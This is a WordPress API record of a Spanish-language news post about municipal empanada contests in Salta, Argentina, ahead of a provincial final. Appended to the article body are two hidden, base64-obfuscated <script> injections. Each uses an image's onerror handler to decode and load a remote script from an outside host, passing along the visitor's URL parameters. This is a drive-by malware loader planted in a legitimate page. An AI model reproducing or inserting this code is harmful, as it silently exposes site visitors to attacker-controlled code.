{"id":3794,"date":"2024-03-01T18:23:01","date_gmt":"2024-03-01T21:23:01","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3794"},"modified":"2025-08-13T23:59:26","modified_gmt":"2025-08-14T02:59:26","slug":"municipios-avanzan-en-la-eleccion-de-sus-representantes-para-un-nuevo-concurso-de-la-empanada","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3794","title":{"rendered":"Municipios avanzan en la elecci\u00f3n de sus representantes para un nuevo Concurso de la Empanada"},"content":{"rendered":"\n<h5 class=\"wp-block-heading\"><strong><em>Con una importante participaci\u00f3n de concursantes y p\u00fablico, realizan sus concursos para elegir quienes los representar\u00e1n en el certamen, que se llevar\u00e1 a cabo el 4 de abril, en la capital provincial.<\/em><\/strong><\/h5>\n\n\n\n<p>Como cada a\u00f1o los concursos de la empanada, organizados por cada municipio, son una fiesta tur\u00edstica y gastron\u00f3mica acompa\u00f1ada por m\u00fasica y ferias de diferentes productos, que permiten a salte\u00f1os y visitantes recorrer cada pueblo, conocer su historia y sus atractivos naturales.<\/p>\n\n\n\n<p>Estos encuentros, que generan un importante impacto econ\u00f3mico, se vienen realizando durante todo el verano, con el fin de elegir al mejor o a la mejor representante del municipio que participar\u00e1 en el III Concurso Provincial de la Empanada Salte\u00f1a que se llevar\u00e1 adelante el jueves 4 de abril en la capital provincial.<\/p>\n\n\n\n<p>El ministro de Turismo y Deportes,&nbsp;<strong>Mario Pe\u00f1a<\/strong>, destac\u00f3 el federalismo del Concurso Provincial y la importancia de la cultura gastron\u00f3mica de cada una de las siete regiones. \u201cLa empanada es un atractivo gastron\u00f3mico y tur\u00edstico \u00fanico que nos caracteriza, y que adem\u00e1s genera cientos de miles de puestos de trabajo para emprendedores que sostienen a sus familias con la elaboraci\u00f3n de empanadas, cuyas recetas son transmitidas de generaci\u00f3n en generaci\u00f3n\u201d, sostuvo el funcionario.<\/p>\n\n\n\n<p>Algunos de los municipios que ya tienen su representante son Rivadavia Banda Sur y El Galp\u00f3n que tuvieron su evento a mediados del a\u00f1o pasado. Adem\u00e1s, en enero se realizaron concursos de la empanada en los municipios de San Lorenzo, Chicoana y El Carril.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img fetchpriority=\"high\" decoding=\"async\" width=\"900\" height=\"600\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/11122-municipios-avanzan-en-la-eleccion-de-sus-representantes-para-un-nuevo-concurso-de-la-empanada.jpeg\" alt=\"\" class=\"wp-image-3795\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/11122-municipios-avanzan-en-la-eleccion-de-sus-representantes-para-un-nuevo-concurso-de-la-empanada.jpeg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/11122-municipios-avanzan-en-la-eleccion-de-sus-representantes-para-un-nuevo-concurso-de-la-empanada-300x200.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/11122-municipios-avanzan-en-la-eleccion-de-sus-representantes-para-un-nuevo-concurso-de-la-empanada-768x512.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/11122-municipios-avanzan-en-la-eleccion-de-sus-representantes-para-un-nuevo-concurso-de-la-empanada-696x464.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/11122-municipios-avanzan-en-la-eleccion-de-sus-representantes-para-un-nuevo-concurso-de-la-empanada-630x420.jpeg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<p>Asimismo, en el mes Febrero, con gran convocatoria, se organiz\u00f3 el evento donde visitante pudieron deleitarse con este emblem\u00e1tico plato en los municipios de General Ballivian, La Caldera, Campo Quijano, Aguaray, Seclant\u00e1s, San Carlos, Molinos y Guachipas.<\/p>\n\n\n\n<p>Los concursos continuar\u00e1n en marzo, en General Mosconi y Animan\u00e1 se podr\u00e1 degustar empanadas el domingo 3 de marzo; en Apolinario Saravia, El Tala y El Jard\u00edn el s\u00e1bado 16; en las localidades de Cachi, La Candelaria y Or\u00e1n el domingo 17 y en Tartagal el 23 de marzo.<\/p>\n\n\n\n<p>A trav\u00e9s de la competencia, se busca jerarquizar un producto \u00edcono de la gastronom\u00eda y en a\u00f1os anteriores, fueron m\u00e1s de 30 los municipios que participaron, resultando ganadoras Gloria del Valle Aguirre de Chicoana, en la primera edici\u00f3n y Dominga Eugenia Aguilera de El Jard\u00edn, en la segunda.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con una importante participaci\u00f3n de concursantes y p\u00fablico, realizan sus concursos para elegir quienes los representar\u00e1n en el certamen, que se llevar\u00e1 a cabo el 4 de abril, en la capital provincial. Como cada a\u00f1o los concursos de la empanada, organizados por cada municipio, son una fiesta tur\u00edstica y gastron\u00f3mica acompa\u00f1ada por m\u00fasica y ferias [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3796,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,3],"tags":[],"class_list":{"0":"post-3794","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-gourmet"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3794"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3794"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3794\/revisions"}],"predecessor-version":[{"id":6836,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3794\/revisions\/6836"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3796"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3794"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3794"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3794"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}